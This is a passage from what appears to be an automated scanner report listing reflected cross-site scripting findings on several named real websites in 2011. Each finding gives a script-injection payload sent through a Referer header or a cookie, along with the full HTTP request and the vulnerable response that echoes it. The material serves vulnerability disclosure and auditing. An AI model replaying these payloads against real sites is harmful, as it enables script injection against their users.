a:link, a:visited {color: #0000FF; text-decoration: none;}
a:hover {color: #0000FF; text-decoration: underline;}
a:active {color: #0000FF; text-decoration: none;}

...[SNIP]...
<body bgcolor='EEE/b5a4a'><script>alert(1)</script>036c8c6f9ecDEA'>
...[SNIP]...

3.180. http://www.yourwebsitevalue.com/getsearchbox.cgi [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yourwebsitevalue.com
Path:   /getsearchbox.cgi

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1349'-alert(1)-'4ed7fdc4ff1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getsearchbox.cgi HTTP/1.1
Host: www.yourwebsitevalue.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b1349'-alert(1)-'4ed7fdc4ff1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:41 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
Content-Length: 3320
Content-Type: text/html

<html>
<head>    
       <script language="JavaScript" type="text/javascript">
           //Gets the browser specific XmlHttpRequest Object
           function YWVgetXmlHttpRequestObject() {
               if (window.XMLHttpRequest) {

...[SNIP]...
<script type="text/javascript">
YWVcheckValue('http://www.google.com/search?hl=en&q=b1349'-alert(1)-'4ed7fdc4ff1',2);
</script>
...[SNIP]...

3.181. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [vsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/chatcisp1/safe-monitor.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417f3"-alert(1)-"9bc35301f96 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/chatcisp1/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465905985 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/products/cisp/restora_backup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5417f3"-alert(1)-"9bc35301f96

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 3473
Date: Sun, 15 May 2011 13:25:30 GMT
Connection: close

var ps_chatcisp1_sid = "sqa5xksTHqX5417f3"-alert(1)-"9bc35301f96";
// safe-monitor@gecko.js

var ps_chatcisp1_iso;
try {
   ps_chatcisp1_iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.ps_chatcisp1_wid != null);
} catch(e) {
   ps_chatcisp1_iso
...[SNIP]...

3.182. http://image.providesupport.com/js/corecommerce/safe-standard.js [vsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/corecommerce/safe-standard.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8c3c"-alert(1)-"57d21297b34 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/corecommerce/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5e8c3c"-alert(1)-"57d21297b34

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 5155
Date: Sun, 15 May 2011 13:57:05 GMT
Connection: close

var psXMz2sid = "sqa5xksTHqX5e8c3c"-alert(1)-"57d21297b34";
// safe-standard@gecko.js

var psXMz2iso;
try {
   psXMz2iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psXMz2wid != null);
} catch(e) {
   psXMz2iso = false;
}
if (psXMz2iso)
...[SNIP]...

3.183. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload c3533<script>alert(1)</script>009f5d08c6b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.oscommerce.com%2Fabout%2Fnews%2C135&jsref=http%3A%2F%2Fwww.oscommerce.com%2Fsolutions&rnd=1305467849538 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce.com/about/news,135
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==c3533<script>alert(1)</script>009f5d08c6b

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sun, 15 May 2011 13:59:59 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3OVb2YWRTJR8rMAg==c3533<script>alert(1)</script>009f5d08c6b
userid:
</div>
...[SNIP]...

3.184. http://store.mandriva.com/ [osCsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload 5513d<script>alert(1)</script>ff2ec5c09da was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?action=buy_now&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e65513d<script>alert(1)</script>ff2ec5c09da; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:31:33 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14529

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e65513d<script>alert(1)</script>ff2ec5c09da', '1305471333', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.185. http://store.mandriva.com/g/style/base-min.css [osCsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /g/style/base-min.css

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload aff8e<script>alert(1)</script>3048c8f55e5 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /g/style/base-min.css HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6aff8e<script>alert(1)</script>3048c8f55e5; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:28:39 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14820

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <m
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e6aff8e<script>alert(1)</script>3048c8f55e5', '1305471160', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.186. http://store.mandriva.com/g/style/reset-fonts-grids.css [osCsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /g/style/reset-fonts-grids.css

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload 6d280<script>alert(1)</script>864c9da4fc6 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /g/style/reset-fonts-grids.css HTTP/1.1
Host: store.mandriva.com
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: osCsid=ec2a9a6ea60155f00ba7c10d328b14af6d280<script>alert(1)</script>864c9da4fc6

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:27 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14956

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <m
...[SNIP]...
<br>insert into sessions values ('ec2a9a6ea60155f00ba7c10d328b14af6d280<script>alert(1)</script>864c9da4fc6', '1305469527', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.187. http://store.mandriva.com/just_added.php [osCsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /just_added.php

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload e1a93<script>alert(1)</script>a601e6228df was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /just_added.php?products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/product_info.php?products_id=495
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6e1a93<script>alert(1)</script>a601e6228df; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.2.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:31:13 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 7644

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="verify-v1" content="0fEbSr6Xb4TWnbDkESAq/WBiiZ
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e6e1a93<script>alert(1)</script>a601e6228df', '1305471313', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.188. http://store.mandriva.com/product_info.php [osCsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload e2cc3<script>alert(1)</script>a9b554f8c69 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /product_info.php?products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6e2cc3<script>alert(1)</script>a9b554f8c69; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:30:13 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14529

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e6e2cc3<script>alert(1)</script>a9b554f8c69', '1305471253', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.189. http://store.mandriva.com/product_info.php [osCsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload b2b5b<script>alert(1)</script>949c83499ab9a5e0e was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which allows easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /product_info.php?products_id=495&action=add_product&id%5B24%5D=88&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/product_info.php?products_id=495
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6b2b5b<script>alert(1)</script>949c83499ab9a5e0e; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.2.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:35:53 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 7724

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="verify-v1" content="0fEbSr6Xb4TWnbDkESAq/WBiiZ
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e6b2b5b<script>alert(1)</script>949c83499ab9a5e0e', '1305471593', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.190. http://www.vehix.com/ [physicalzip cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vehix.com
Path:   /

Issue detail

The value of the physicalzip cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 386bc</script><script>alert(1)</script>cd811f435f3 was submitted in the physicalzip cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?VXSS=1 HTTP/1.1
Host: www.vehix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: physicalzip=75201386bc</script><script>alert(1)</script>cd811f435f3; PreviousPostalCode=75201; VXBETA=0; SSLB=1

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Keep-Alive: timeout=5, max=247
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 14:26:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: zip=75201386bc</script><script>alert(1)</script>cd811f435f3; domain=www.vehix.com; expires=Tue, 14-Jun-2011 13:20:14 GMT; path=/
Set-Cookie: market=; domain=www.vehix.com; expires=Sun, 15-May-2011 13:50:14 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.www.vehix.com
Set-Cookie: SSID=BQC9SxsAAAAAAAAO089NxZEICA7Tz00BAAAAAAAAAAAADtPPTQA; path=/; domain=.www.vehix.com; expires=Mon, 14-May-2012 13:20:14 GMT
Set-Cookie: SSSC=86.G5606932118317339077.1|0.0; path=/; domain=.www.vehix.com
Set-Cookie: SSRT=DtPPTQE; path=/; domain=.www.vehix.com; expires=Mon, 14-May-2012 13:20:14 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MACHINE: PROD-WEB-BL06
Set-Cookie: PreviousPostalCode=75201386bc</script><script>alert(1)</script>cd811f435f3; domain=.www.vehix.com; expires=Sun, 15-May-2011 13:50:14 GMT; path=/
Set-Cookie: anid=0hAsqpRJzAEkAAAANzhjNGY5ODMtOWU5MS00MDRhLWIyMDQtYmFiYzRlY2QxZGQ00; domain=.www.vehix.com; expires=Sun, 24-Jul-2011 00:00:14 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=f3m1d555vw0qylak2bpoj445; path=/; HttpOnly
Set-Cookie: zip=75201386bc</script><script>alert(1)</script>cd811f435f3; domain=.www.vehix.com; expires=Tue, 14-Jun-2011 13:20:14 GMT; path=/
Set-Cookie: market=; domain=.www.vehix.com; expires=Sun, 15-May-2011 13:50:14 GMT; path=/
Set-Cookie: breadcrumb=Home|/default.aspx?VXSS=1:; path=/
Set-Cookie: sid=f3m1d555vw0qylak2bpoj445; path=/
RTSS: 1
X-Robots-Tag: NOINDEX, NOFOLLOW
X-Powered-By: ASP.NET
MACHINE: PROD-WEB-BL09
Date: Sun, 15 May 2011 13:20:14 GMT
Content-Length: 161063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- // --><script la
...[SNIP]...
<script type="text/javascript">

s.pageName='Home';
s.server='PROD-WEB-BL06';
s.channel='Home';
s.prop9='Logged Out';
s.prop24='Vehix';
s.events='event20';
s.eVar7='75201386bc</script><script>alert(1)</script>cd811f435f3';
s.eVar22='Home';
s.eVar27='Vehix';
</script>
...[SNIP]...

3.191. http://www.vehix.com/default.aspx [physicalzip cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vehix.com
Path:   /default.aspx

Issue detail

The value of the physicalzip cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62653</script><script>alert(1)</script>c7e77554239 was submitted in the physicalzip cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

